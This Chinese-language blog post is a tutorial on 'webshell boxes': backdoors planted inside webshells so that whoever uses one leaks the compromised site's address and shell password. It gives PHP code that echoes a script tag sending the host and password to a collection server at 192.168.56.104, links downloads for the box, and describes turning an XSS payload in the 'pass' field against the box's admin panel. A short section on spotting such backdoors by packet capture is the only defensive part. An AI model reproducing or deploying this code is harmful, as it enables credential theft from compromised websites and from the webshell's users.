目錄
- “黑吃黑”webshell箱子
- 環境準備
- 馬中馬
- 預防后門
- 反殺webshellbox
“黑吃黑”webshell箱子
什么是webshell箱子?通俗一點的解釋:
它可以讓你在webshell中植入后門,當別人用你植入過后門的webshell去獲取滲透別的網站時,你的webshellbox信封將會收到他留下的后門地址以及密碼
環境準備
搭建一個asp的服務器,我們這里選用小旋風進行搭建http://lt.yx12345.com:90/yasuobao/jyx12345xiaoxuanfenglinshiaspfuwuqiminiban.zip下載完成后解壓到虛擬機里面,
箱子:https://pan.baidu.com/s/1D3msIms4Rcf098fqWdQgzQ
提取碼:6666
細節我就不說了,搭建至下圖這一步
馬中馬
插入到大馬的代碼中:
<?php
//假設這是某大馬的php檔案
//某大馬的后門密碼變數如下
$password='admin';
//馬中馬[doge]
$u=$_SERVER["HTTP_HOST"].$_SERVER["PHP_SELE"];
echo "<script src='http://192.168.56.104/api.asp?url=$u&pass=$password'></script>
";
?>
解釋:
&_SERVER["PHP_SELE"];正在執行的腳本檔案名
$_SERVER["HTTP_HOST"];獲取當前請求的host頭部內容(網站地址)
上面兩句實作獲取當前網站的ip地址
echo "<script..../script>";指向信封(webshellbox)當大馬獲取的東西,你的webshellbox也能獲取一份
另外:echo這句語法可以在webshellbox檔案中查看到(ASP的就用第一句、PHP的就用第二句):
最后訪問網站后,webshell自動獲取了大馬的后門,以及后門密碼
預防后門
如何判斷自己使用的大馬中沒有被植入后門呢?
一般可以采用抓包,查看大馬中有沒有向一些奇怪的網站發送包
當找到后門地址后,甚至可以采用xss跨站攻擊盜取cookie進行反殺…
反殺webshellbox
采用burpsuite抓包,抓到后門包后,將pass改為xss跨站攻擊代碼
當登錄到后臺查看時,成功爆出跨站代碼
相關文章:
你知道嗎?你用的大馬可能早就被植入了后門!
如何利用xss拿下一個站的權限?
滲透測驗常用靶場集合
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/357023.html
標籤:其他